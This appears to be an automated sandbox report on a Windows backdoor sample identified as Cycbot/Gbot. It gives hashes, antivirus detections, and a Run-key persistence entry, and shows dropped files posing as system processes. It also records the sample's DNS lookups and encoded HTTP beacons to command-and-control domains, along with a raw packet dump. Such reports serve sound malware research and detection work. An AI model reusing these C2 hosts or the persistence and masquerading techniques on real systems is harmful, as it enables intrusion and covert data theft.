Analysis Date2014-06-15 19:06:48
MD5a5be5567ce8f9446b35fe8edd1cb217c
SHA158bb7be3943dfb48b9de46f66d8110b027896ebc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 30c03a1185413274122a542f9772b841 sha1: d3f156038b02843970d02b718c51180e781b4bd3 size: 163840
Section.rdata md5: 751cf4a48434d488ebe245394114b3bb sha1: 55a570b70ebd156425a972fc885b1ef3b87990db size: 1536
Section.data md5: 244f8a69b8714c6f0b22ae54d9d475f3 sha1: 9f3cc76f472272d420667459fbd31b812b1affa8 size: 22528
Section.imul md5: c0c9e5983ecd8b90ca81dd2455eb003c sha1: f083dc3024733c0e55646fd27b3583f589e42396 size: 512
Timestamp2005-11-02 10:22:56
VersionPrivateBuild: 1396
PEhasha2c76869982db5237f356a2d49d65c517b5140df
IMPhash3a9915de84dc7dbafcc23da7096ae1bc
AV360 SafeGen:Trojan.Heur.KS.1
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)BDS/Gbot.ACG.4
AVAvira (antivir)BDS/Gbot.ACG.4
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-54
AVClamAVTrojan.Gbot-54
AVDr. WebBackDoor.Gbot.24
AVDr. WebBackDoor.Gbot.24
AVEmsisoftGen:Trojan.Heur.KS.1
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Cycbot.AF
AVEset (nod32)Win32/Cycbot.AF
AVFortinetW32/FraudLoad.MK!tr
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CIX
AVGrisoft (avg)Cryptic.CIX
AVIkarusBackdoor.Win32.Gbot
AVIkarusBackdoor.Win32.Gbot
AVKasperskyBackdoor.Win32.Gbot.aci
AVKasperskyBackdoor.Win32.Gbot.aci
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSpdasoftstorage.com
Winsock DNS127.0.0.1
Winsock DNShappyaladdin.com
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNScrazyleafdesign.com
Type: A
173.249.152.55
DNSzonetf.com
Type: A
208.73.211.236
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.177
DNSzonetf.com
Type: A
208.73.211.164
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.236
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.177
DNSzonetf.com
Type: A
208.73.211.164
DNShappyaladdin.com
Type: A
DNSpdasoftstorage.com
Type: A
HTTP GEThttp://crazyleafdesign.com/blog/images/share/facebook.png?v50=54&tq=gJ4WK%2FSUh4zChRMw9YLJgMSTUivqg4aMw5JEfqHXarVJ%2BQhheHM%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 173.249.152.55:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.236:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f66 61636562 6f6f6b2e   /share/facebook.
0x00000020 (00032)   706e673f 7635303d 35342674 713d674a   png?v50=54&tq=gJ
0x00000030 (00048)   34574b25 32465355 68347a43 68524d77   4WK%2FSUh4zChRMw
0x00000040 (00064)   39594c4a 674d5354 55697671 6734614d   9YLJgMSTUivqg4aM
0x00000050 (00080)   77354a45 66714858 6172564a 25324251   w5JEfqHXarVJ%2BQ
0x00000060 (00096)   68686548 4d253344 20485454 502f312e   hheHM%3D HTTP/1.
0x00000070 (00112)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000080 (00128)   6c6f7365 0d0a486f 73743a20 6372617a   lose..Host: craz
0x00000090 (00144)   796c6561 66646573 69676e2e 636f6d0d   yleafdesign.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a                       ose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a                                ...


Strings
x2.uU.3....
..
.<
`s...^5.y(
.6
P6d....U6.q..i.
j..
.\..q6..Bm2|..d.B..:.i
..1E.t
.8.[...|....S.......
.=. 
.?..
.wg
..BJ
k...1\..
.pB..@
.
..
....
..
040904b0
1396
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
+0:#S/
2OsYn-
3icYM;=u
6:&T'`
6z7Twf
7FFI0'
7H]ylY
8|+:4i
\\8|\R
[a[Oaea
BeginPaint
Bo<N^J
CallWindowProcA
(Ce#eX
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
CreateFiber
CreateWindowExA
C'w[t%
d1Hao@1
@.data
Dmao =
_dQ2kK
EndPaint
EnumResourceNamesA
ExitProcess
GetACP
GetClientRect
GetCommandLineA
GetFocus
GetKeyState
GetLocaleInfoA
GetParent
GetProcAddress
GetSystemInfo
HeapAlloc
HeapDestroy
HeapReAlloc
HeapSize
Hh^=)5
h^LM[n
HV2L4g`
HV6])M
^|h{vvn
iIwKm{
"Ij`s)
InterlockedCompareExchange
IntersectRect
InvalidateRect
IsChild
IsProcessorFeaturePresent
IsWindow
J#~]FF.
J.h>?b
	jN8&.
jo-VYw
KERNEL32.dll
kf|bR;dw%
kvM?*Jr
KX_.V^[
ljWF{c
LoadLibraryA
*lO^lb
}m7V\2
m[TE/'r~
NM}(p1
o1S:_yO
oHi)yP
OI]DHy
PtInRect
%qwD%cB
`.rdata
RealGetWindowClassA
RegisterClassExA
ResumeThread
Rich`x
RtlUnwind
SetFocus
SetThreadPriority
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
tB@y6O
TerminateProcess
!This program cannot be run in DOS mode.
Ti^IBj
TK`hVje
:T_.<TSF
tXtJ\@
_=/{|U
U4RQ@&v
ud+&e$
/u"+Fm0
[UM5)k_
UnhandledExceptionFilter
UnionRect
UnregisterClassA
USER32.dll
[?UZ{b
V3z8l4
v5>r>5
Ve`YxQ
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Vo=I]|@U4+
^VP?Y<
vQ#J4<x
vT],nG
\[vzzM
w6:\ad;F
.{WH\X#
WriteFile
*~X|4H
_X|SuS$
(<x_.tI
XvHONC
XxHz9#
+y_hV	I
YMN?+_
yut;|l+
y[Yvm3
Y}}Z8(,Xt